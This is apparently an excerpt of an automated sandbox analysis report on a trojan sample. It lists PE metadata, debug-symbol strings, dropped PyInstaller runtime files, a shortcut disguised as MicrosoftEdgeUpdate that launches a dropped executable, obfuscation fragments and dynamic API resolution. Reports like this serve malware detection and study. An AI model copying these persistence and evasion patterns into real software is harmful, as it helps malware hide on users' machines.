Source: MicrosoftEdgeUpdate.lnk.0.dr LNK file: ..\..\..\..\..\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312055704.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312690465.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.10.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307390313.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2339757329.00007FF8B83B1000.00000002.00000001.01000000.0000000C.sdmp, ucrtbase.dll.10.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309132497.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306770912.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310481991.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311357401.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309132497.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312870947.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311585051.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2340109854.00007FF8BFB81000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307880735.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310816524.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310155822.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307880735.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311214975.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312267619.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307762133.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307008995.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309513493.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2340265545.00007FF8BFB9E000.00000002.00000001.01000000.0000000E.sdmp, VCRUNTIME140.dll.10.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311357401.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309513493.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305736309.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313183679.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307202317.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310650811.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309384633.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310329484.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312518356.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311078798.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310816524.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306288595.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PdB] source: 7DF0.tmp.zx.exe.3.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307008995.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309750638.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: 7DF0.tmp.zx.exe, 0000000C.00000002.2339757329.00007FF8B83B1000.00000002.00000001.01000000.0000000C.sdmp, ucrtbase.dll.10.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307202317.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311078798.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2340265545.00007FF8BFB9E000.00000002.00000001.01000000.0000000E.sdmp, VCRUNTIME140.dll.10.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312870947.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311214975.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313183679.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307762133.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310481991.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310329484.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307390313.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309384633.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309750638.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306288595.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310950788.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2338790461.00007FF8A8DFD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308985706.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.10.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312267619.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308013050.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310013332.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313036528.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309639448.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.10.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306770912.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312055704.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308142882.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308985706.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309257952.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313338907.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309879949.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310650811.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310013332.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305736309.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307569047.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312518356.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313338907.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308142882.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309257952.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310155822.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308013050.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312690465.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309639448.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.10.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309879949.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311585051.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313036528.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310950788.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.10.dr
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Binary contains a suspicious time stamp
Source: 5BB2.tmp.x.exe.3.dr Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF941B30 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingA,CloseHandle,CloseHandle,VirtualFree, 0_2_00007FF6CF941B30
PE file contains sections with non-standard names
Source: libcrypto-1_1.dll.10.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\explorer.exe Code function: 3_2_0336A572 push rcx; ret 3_2_0336A5A8
Source: C:\Windows\explorer.exe Code function: 3_2_0336A595 push rcx; ret 3_2_0336A5A8
Source: C:\Windows\explorer.exe Code function: 3_2_08B8C395 push rcx; ret 3_2_08B8C3A8
Source: C:\Windows\explorer.exe Code function: 3_2_08B8C372 push rcx; ret 3_2_08B8C3A8
Source: C:\Windows\explorer.exe Code function: 3_2_09F13360 push rsp; retf 3_2_09F13379
Source: C:\Windows\explorer.exe Code function: 3_2_09F12FEC push rax; retn 0003h 3_2_09F12FF1
Source: C:\Windows\explorer.exe Code function: 3_2_11084360 push rsp; retf 3_2_11084379
Source: C:\Windows\explorer.exe Code function: 3_2_11083FEC push rax; retn 0003h 3_2_11083FF1
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_04ECD442 push eax; ret 6_2_04ECD451
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8324A15 push rdi; ret 12_2_00007FF8B8324A1B
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8329F52 push rdi; ret 12_2_00007FF8B8329F56
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83244F9 push rdi; ret 12_2_00007FF8B8324502
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B832983D push rdi; ret 12_2_00007FF8B8329844
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB9CB1B push rbp; retf 12_2_00007FF8BFB9CB28
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\libffi-7.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
